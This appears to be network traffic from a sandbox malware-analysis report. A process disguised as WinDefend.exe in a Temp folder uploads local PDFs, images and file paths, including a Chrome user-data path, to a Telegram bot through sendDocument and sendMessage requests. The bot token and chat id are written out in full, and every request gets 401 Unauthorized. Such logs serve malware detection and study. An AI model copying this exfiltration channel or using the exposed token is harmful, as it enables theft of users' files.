2024-05-23 13:34:28 UTC	105	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 65 6d 70 6c 61 74 65 33 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 65 6d 70 6c 61 74 65 33 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=template3.pdf; filename*=utf-8''template3.pdf
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 39 20 30 20 6f 62 6a 20 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 32 36 32 34 38 2f 4f 20 31 37 2f 45 20 32 30 36 33 37 2f 4e 20 31 2f 54 20 32 36 30 32 32 2f 48 20 5b 20 39 35 36 20 32 32 32 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 39 20 33 33 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 37 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 30 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 34 33 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 34 37 30 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 36 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 Data Ascii: %PDF-1.6%9 0 obj <</Linearized 1/L 26248/O 17/E 20637/N 1/T 26022/H [ 956 222]>>endobj xref9 330000000016 00000 n0000001178 00000 n0000001306 00000 n0000001432 00000 n0000001470 00000 n0000001565 00000 n0000001
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: ad e1 33 b7 aa fe d9 53 19 cf ef d7 7f 8f 5f bf ff cc cf bf bf 1f f9 b0 e7 bf cf 47 49 ed e0 52 29 76 58 96 e7 97 5b a4 db b2 bc dd a2 da 97 85 d8 b4 38 a6 7d c7 25 8f e7 eb b1 5b 72 1f be a2 74 09 6c f5 b9 9f 41 fc ba c5 41 cb fb 47 64 ef c7 3f b0 55 ec cb 6e 4b 23 7b b4 d3 a2 87 25 c6 52 8f 56 ab e3 64 1a 27 e7 b6 70 9c 34 8a 6c 2b 3a 62 6b 9b 87 89 e3 0c ee b8 2c b5 85 cf f0 50 8f 2c 7d 3b 23 f0 eb 71 45 31 57 5c 71 87 87 7b 1e 2f cf 6d e6 ab c7 a8 f7 4e 84 e5 ec 44 be 2c 8e bb c3 5e ce c6 e4 28 46 4b 65 36 a2 f5 95 5c b8 00 19 3e 2c 88 69 6e ba 19 7a 35 f7 5a 35 bc 8e a1 db 29 08 de 66 bb 6b 2b 2b 1d 77 d0 62 45 16 bd e1 8b 20 d3 62 ad 6d 67 18 82 68 37 82 10 47 49 87 f4 65 79 6f 96 3d 93 59 c2 9f 96 28 61 90 c8 52 fd 20 d1 b4 98 9a b7 a7 8f c0 23 c9 Data Ascii: 3S_GIR)vX[8}%[rtlAAGd?UnK#{%RVd'p4l+:bk,P,};#qE1W\q{/mND,^(FKe6\>,inz5Z5)fk++wbE bmgh7GIeyo=Y(aR #
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: 37 83 2d 19 d1 6c dc ad 4e 59 e6 de fd a6 a7 4f e2 35 5f 0f 09 cf 3c 31 29 b1 f7 68 c7 12 a8 b6 28 ad e9 09 19 6c 4e 96 e0 85 29 d9 4d 16 50 71 f2 e0 4f 30 db 69 3e 27 e0 53 5b 37 a2 63 6f 1f bd 96 d2 eb 77 74 22 3d d9 3b 1e ed 8d e7 f7 90 88 af 16 cf 33 12 81 8f 00 76 de 38 2d 9f e3 38 80 4c e1 1c bc 37 4e 7d f3 5e 24 a0 62 4b 16 99 b7 0d 31 f0 4e 9b 16 fb 6f 2b 33 d7 40 2c c9 39 38 79 2c 09 f4 52 74 38 f6 21 15 a6 55 9f c7 80 a6 33 c2 1c cd 9b 27 4a 7a ec 11 e4 0f b9 d3 ba 25 df 94 cc 4c 0d 16 c4 0d b8 ad 66 56 dd 3d c7 94 03 c1 a7 54 ea c8 13 72 cf 2d f6 e2 c9 77 a3 1a 19 49 7f e6 27 8a 91 f9 cc 4f a9 68 09 47 87 04 ee 75 e5 ab 37 40 f1 2d 50 37 f6 47 a1 63 e8 ee e5 df 90 e8 5a 80 a2 69 02 b3 e9 0b cf 39 37 4e c3 ad 1f 07 e0 c7 98 39 67 7c 70 31 c8 f7 Data Ascii: 7-lNYO5_<1)h(lN)MPqO0i>'S[7cowt"=;3v8-8L7N}^$bK1No+3@,98y,Rt8!U3'Jz%LfV=Tr-wI'OhGu7@-P7GcZi97N9g\|p1
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: 5d 5a af eb ef 3b be cf df eb ff 02 0c 00 8d 81 6e 58 0d 0a 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 33 32 20 30 20 6f 62 6a 3c 3c 2f 4c 65 6e 67 74 68 20 31 36 31 36 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 3e 3e 73 74 72 65 61 6d 0d 0a 48 89 64 57 4d b2 2c ad 0a 9c f7 2a 6a 05 15 8a f2 e3 7a 3a e2 8b 37 e8 b3 ff e9 4b c0 52 bb ef 9d 9c 9b d9 8a 90 20 52 d7 f5 ef bf ff 5e bd d1 dd ba 5d 24 74 0f 6d d7 1f 98 7a 8f 42 60 ca 2d 55 ae 0f 98 76 ab ea 0f d3 ac 5f c4 76 0b 53 30 f5 66 d2 2f a6 dc a3 c1 32 f3 ad 45 26 63 a2 c1 b4 3e 2e c7 3a 18 b8 e3 c4 f6 85 79 8c eb fd 3a 99 aa 35 56 0c f5 73 5b 58 8a 53 3b 2f fc 0e 3f 94 c7 b1 82 ee 12 7e 6d 4c 9d 02 fb 99 b9 63 b0 80 a9 b7 99 cc 58 a4 6a 30 2a c7 a1 a0 2d dd ee 11 58 62 98 20 c3 d6 Data Ascii: ]Z;nXendstreamendobj32 0 obj<</Length 1616/Filter/FlateDecode>>streamHdWM,jz:7KR R^]$tmzB`-Uv_vS0f/2E&c>.:y:5Vs[XS;/?~mLcXj0-Xb
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: d6 26 50 ab f3 6e 04 92 71 21 59 3b 3a 8a 46 62 e6 bd 86 8b 19 dd 02 a9 79 73 c5 36 b1 49 d5 32 93 58 83 91 03 13 eb a4 66 a3 4f cd e9 13 f8 b7 6c fc 9a 64 b1 14 18 af 6c ce 55 94 12 0f af 4a 0f 9d 27 1c 46 43 8e ee 68 84 43 46 a7 ab 34 a0 58 2b c4 93 04 79 79 7d 78 f3 66 cf 90 9c d9 bf 97 cf 07 8e e6 a8 ab 2b 41 84 75 bd c0 8e fb d3 a3 0f d1 b3 9a 7a c0 be 4a b5 04 4d 4d d6 38 a2 3b a1 e8 aa e9 47 4d 29 5e 67 fd 7b df 22 41 9d 6c 61 66 50 2e 74 d5 d1 b9 c9 27 c8 68 19 74 cd 59 3e b4 0a b4 59 91 8e 3c 38 33 07 5f 9c 37 40 1b b2 01 6f f8 54 6e 17 de 50 ef 28 61 cb 13 3e f6 c3 20 10 cc f7 6d 6a c1 60 7b 9d e7 0d 8b e8 f8 50 3e 18 4a 18 6e b3 8b 38 f9 06 a0 55 66 37 aa 41 ed 0a 27 ea 34 a4 6b a9 a8 11 49 37 82 a1 61 c2 e8 89 96 3d d1 af 07 8f ef 98 29 db b0 Data Ascii: &Pnq!Y;:Fbys6I2XfOldlUJ'FChCF4X+yy}xf+AuzJMM8;GM)^g{"AlafP.t'htY>Y<83_7@oTnP(a> mj`{P>Jn8Uf7A'4kI7a=)
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: 6e 64 6f 62 6a 0d 33 39 20 30 20 6f 62 6a 3c 3c 2f 4f 50 4d 20 31 2f 4f 50 20 66 61 6c 73 65 2f 6f 70 20 66 61 6c 73 65 2f 54 79 70 65 2f 45 78 74 47 53 74 61 74 65 2f 53 41 20 66 61 6c 73 65 2f 53 4d 20 30 2e 30 32 3e 3e 0d 65 6e 64 6f 62 6a 0d 34 30 20 30 20 6f 62 6a 3c 3c 2f 4f 50 4d 20 31 2f 4f 50 20 66 61 6c 73 65 2f 6f 70 20 66 61 6c 73 65 2f 54 79 70 65 2f 45 78 74 47 53 74 61 74 65 2f 53 41 20 74 72 75 65 2f 53 4d 20 30 2e 30 32 3e 3e 0d 65 6e 64 6f 62 6a 0d 31 20 30 20 6f 62 6a 3c 3c 2f 43 6f 75 6e 74 20 30 2f 54 79 70 65 2f 4f 75 74 6c 69 6e 65 73 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 20 30 20 6f 62 6a 3c 3c 2f 44 69 66 66 65 72 65 6e 63 65 73 5b 32 34 2f 62 72 65 76 65 2f 63 61 72 6f 6e 2f 63 69 72 63 75 6d 66 6c 65 78 2f 64 6f 74 61 63 63 65 6e 74 Data Ascii: ndobj39 0 obj<</OPM 1/OP false/op false/Type/ExtGState/SA false/SM 0.02>>endobj40 0 obj<</OPM 1/OP false/op false/Type/ExtGState/SA true/SM 0.02>>endobj1 0 obj<</Count 0/Type/Outlines>>endobj2 0 obj<</Differences[24/breve/caron/circumflex/dotaccent
2024-05-23 13:34:28 UTC	1672	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 Data Ascii:
2024-05-23 13:34:28 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 33 63 31 32 34 31 62 64 2d 34 61 62 39 2d 34 64 39 38 2d 62 37 65 36 2d 63 32 66 36 63 38 62 30 37 32 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --3c1241bd-4ab9-4d98-b7e6-c2f6c8b0721eContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	61078	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:28 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="68e19271-1a8c-4a96-bb7f-f989f15c0ebf" Host: api.telegram.org Content-Length: 528 Expect: 100-continue
2024-05-23 13:34:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:28 UTC	40	OUT	Data Raw: 2d 2d 36 38 65 31 39 32 37 31 2d 31 61 38 63 2d 34 61 39 36 2d 62 62 37 66 2d 66 39 38 39 66 31 35 63 30 65 62 66 0d 0a Data Ascii: --68e19271-1a8c-4a96-bb7f-f989f15c0ebf
2024-05-23 13:34:28 UTC	143	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=topbar_floating_button_hover.png; filename*=utf-8''topbar_floating_button_hover.png
2024-05-23 13:34:28 UTC	160	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 42 49 44 41 54 78 da ec ce 41 11 00 30 08 c4 c0 2b 42 98 7a c0 73 dd 80 a6 0e 2a ee 93 18 c8 9e cc fb 24 95 3c 75 18 e7 5b 85 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 68 e3 7f be 00 03 00 8f 43 04 43 41 29 d3 86 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR szztEXtSoftwareAdobe ImageReadyqe<BIDATxA0+Bzs*$<u[hCCA)IENDB`
2024-05-23 13:34:28 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 38 65 31 39 32 37 31 2d 31 61 38 63 2d 34 61 39 36 2d 62 62 37 66 2d 66 39 38 39 66 31 35 63 30 65 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --68e19271-1a8c-4a96-bb7f-f989f15c0ebfContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:28 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:28 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 38 65 31 39 32 37 31 2d 31 61 38 63 2d 34 61 39 36 2d 62 62 37 66 2d 66 39 38 39 66 31 35 63 30 65 62 66 2d 2d 0d 0a Data Ascii: --68e19271-1a8c-4a96-bb7f-f989f15c0ebf--
2024-05-23 13:34:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	61082	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:29 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 237 Expect: 100-continue
2024-05-23 13:34:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:29 UTC	237	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 38 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+apple-touch-icon-144x144-precomposed.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Capple-touch-icon-144x144-precomposed.png%0ASize%3A+8+KB
2024-05-23 13:34:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	61083	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:29 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 171 Expect: 100-continue
2024-05-23 13:34:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:29 UTC	171	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 48 6f 73 74 65 64 53 65 72 76 69 63 65 73 54 65 6d 70 6c 61 74 65 73 25 35 43 45 4e 55 25 35 43 74 65 6d 70 6c 61 74 65 31 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 35 39 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+template1.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CHostedServicesTemplates%5CENU%5Ctemplate1.pdf%0ASize%3A+59+KB
2024-05-23 13:34:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	61084	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:29 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:34:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:29 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 31 32 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+128.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:34:29 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:29 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	61085	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:30 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="ace3ea1e-b52e-4af8-b2cf-6e562ff36ead" Host: api.telegram.org Content-Length: 9435 Expect: 100-continue
2024-05-23 13:34:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:30 UTC	40	OUT	Data Raw: 2d 2d 61 63 65 33 65 61 31 65 2d 62 35 32 65 2d 34 61 66 38 2d 62 32 63 66 2d 36 65 35 36 32 66 66 33 36 65 61 64 0d 0a Data Ascii: --ace3ea1e-b52e-4af8-b2cf-6e562ff36ead
2024-05-23 13:34:30 UTC	159	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=apple-touch-icon-144x144-precomposed.png; filename*=utf-8''apple-touch-icon-144x144-precomposed.png
2024-05-23 13:34:30 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 90 00 00 00 90 08 06 00 00 00 e7 46 e2 b8 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a c3 00 00 0a c3 01 34 29 24 ab 00 00 00 16 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 31 30 2f 33 30 2f 31 32 62 c2 cd 43 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 20 00 49 44 41 54 78 9c ed 9d 79 98 14 d5 d5 c6 7f 55 bd 77 cf 4c 0f c3 0c fb c0 b0 6f 03 02 2e 6c 82 b8 c5 8d a8 49 be 44 4d f4 73 c1 35 2e 89 1a 63 d4 24 1a 57 22 06 b7 68 34 9a 8f a8 31 2a a2 a2 06 dc 05 11 45 44 51 21 02 82 82 ac b2 cc c2 f4 4c ef 5d 55 df 1f 3d dd d3 dd d3 4b 55 75 75 cf 80 f3 3e 4f 33 f4 bd e7 de 7b 6e Data Ascii: PNGIHDRFsBIT\|dpHYs4)$tEXtCreation Time10/30/12bCtEXtSoftwareAdobe Fireworks CS6 IDATxyUwLo.lIDMs5.c$W"h41*EDQ!L]U=KUuu>O3{n
2024-05-23 13:34:30 UTC	4096	OUT	Data Raw: 9c ed 7a 24 ea 55 2c e8 b1 46 42 63 63 63 4e 0d f3 3d 01 a3 a3 de 4e 28 8a 22 8a 2c f3 9b e9 c7 f3 ed ba 2f b1 3b 5d 00 34 37 35 72 e2 05 e7 73 c9 dc bb 0d d5 6d ed fb 1f 70 c7 99 bf 20 12 0a 63 73 3a e3 17 3c 7a 7c 70 90 80 df cb 09 e7 9e cb 45 b3 ef c0 ea 48 ff 66 c4 c4 9b 24 08 02 7e af 97 e6 fa 06 9a ea ea 68 aa ab c7 53 5f 8f a7 be 01 4f 63 23 fe 96 16 82 3e 3f 91 70 18 7f 4b 0b a2 c9 8c a3 a4 04 93 d9 4c 49 b9 9b 6e 3d 7b d0 b3 66 00 7d 06 0d a4 cf e0 41 49 7d 4d 24 79 36 e4 ca 57 45 a0 a4 02 06 5e f0 42 12 2b d6 f1 77 ff f5 0c 0f 5c 71 05 65 ee ee c4 86 db 01 9f 8f db 5e 7d 89 11 93 27 1a 72 c4 0c b4 f5 65 ed b2 e5 dc 7e e6 d9 84 43 21 1c 2e 57 52 19 59 51 68 f6 34 d0 7f e8 08 66 dd 79 1b 87 1e 7f 2c 00 8d 7b f6 d0 b8 67 2f fb 76 ec 64 df 8e 1d ec Data Ascii: z$U,FBcccN=N(",/;]475rsmp cs:<z\|pEHf$~hS_Oc#>?pKLIn={f}AI}M$y6WE^B+w\qe^}'re~C!.WRYQh4fy,{g/vd
2024-05-23 13:34:30 UTC	859	OUT	Data Raw: c5 46 47 8f c4 b4 96 2b b4 1b d3 e4 c2 d4 34 20 d2 7a 94 5b 7d 03 26 31 5a 7d 28 10 a4 7a e8 30 a6 b4 1e ea 1d 83 1c 89 f0 c2 83 0f f1 d4 ec d9 38 5d 65 d1 43 0f 12 05 84 e8 13 a4 41 bf 9f 5f ce 99 cd e4 1f 9e 12 7d 1a a1 00 c4 29 24 19 0f 64 37 a6 c9 85 19 e1 ba e4 d6 fa 9c e5 6e 22 72 04 2b d1 13 e1 c7 cd 98 de 26 d4 ba 7d e3 9f b7 dc c6 2b 8f 3f 86 ab 95 3c 89 10 04 81 50 20 48 28 18 e0 b2 39 b3 39 e6 ac e8 b1 2c b9 26 0b 3b da 95 7d 9f dc 18 a4 6c b7 04 9e 25 00 00 02 a7 49 44 41 54 69 8d ad 3d 25 7e b4 22 36 a7 33 fe e8 19 04 e5 20 ad cf 9a 30 bc f5 b1 11 80 86 dd bb b9 fd ec f3 58 f8 f8 a3 94 94 96 b7 23 0f 82 80 af a5 05 41 14 b8 f6 91 87 38 f6 ac 33 92 9e e9 4e a7 a7 5e 7d f5 c2 a8 f6 f5 96 d7 52 46 ad ac 1e b9 9c 7b a2 b3 dd ac 6c 0d 9e 74 de 39 Data Ascii: FG+4 z[}&1Z}(z08]eCA_})$d7n"r+&}+?<P H(99,&;}l%IDATi=%~"63 0X#A83N^}RF{lt9
